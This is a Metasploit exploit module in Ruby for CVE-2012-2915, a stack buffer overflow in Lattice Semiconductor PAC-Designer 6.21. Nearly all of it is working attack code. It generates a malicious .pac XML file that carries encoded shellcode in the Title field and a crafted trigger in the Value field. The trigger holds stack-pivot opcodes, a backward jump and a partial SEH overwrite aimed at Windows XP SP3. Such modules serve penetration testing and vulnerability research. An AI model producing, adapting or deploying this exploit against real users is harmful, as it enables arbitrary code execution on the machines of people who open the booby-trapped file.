Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
   'Description'    => %q{
     This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
    6.21.  As a .pac file, when supplying a long string of data to the 'value' field
    under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
    on the stack, which results in arbitrary code execution under the context of the
    user.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Unknown',      #Discovery
     'juan vazquez', #Metasploit
     'sinn3r'        #Metasploit
    ],
   'References'     =>
    [
     ['CVE', '2012-2915'],
     ['OSVDB', '82001'],
     ['EDB', '19006'],
     ['BID', '53566'],
     ['URL', 'http://secunia.com/advisories/48741']
    ],
   'Payload'        =>
    {
     'BadChars' => "\x00\x3c\x3e",
     'StackAdjustment' => -3500,
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "seh"
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'PAC-Designer 6.21 on Windows XP SP3',
      {
       # P/P/R in PACD621.exe
       # ASLR: False, Rebase: False, SafeSEH: False, OS: False
       'Ret' => 0x00805020
      }
     ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "May 16 2012",
   'DefaultTarget'  => 0))

  register_options(
   [
    OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
   ], self.class)
 end

 def exploit
  # The payload is placed in the <title> field
  p = payload.encoded

  # The trigger is placed in the <value> field, which will jmp to our
  # payload in the <title> field.
  buf  = "\x5f"    #POP EDI
  buf << "\x5f"    #POP EDI
  buf << "\x5c"    #POP ESP
  buf << "\x61"*6  #POPAD x 6
  buf << "\x51"    #PUSH ECX
  buf << "\xc3"    #RET
  buf << rand_text_alpha(96-buf.length, payload_badchars)
  buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"  #Jmp back to the beginning of the buffer
  buf << [target.ret].pack('V')[0,3] # Partial overwrite

  xml = %Q|<?xml version="1.0"?>
<PacDesignData>
 <DocFmtVersion>1</DocFmtVersion>
 <DeviceType>ispPAC-CLK5410D</DeviceType>
 <CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
 <SummaryInformation>
  <Title>#{p}</Title>
  <Author>#{Rex::Text.rand_text_alpha(6)}</Author>
 </SummaryInformation>

 <SymbolicSchematicData>
  <Symbol>
   <SymKey>153</SymKey>
   <NameText>Profile 0 Ref Frequency</NameText>
   <Value>#{buf}</Value>
  </Symbol>
 </SymbolicSchematicData>
</PacDesignData>|

  file_create(xml)
 end
end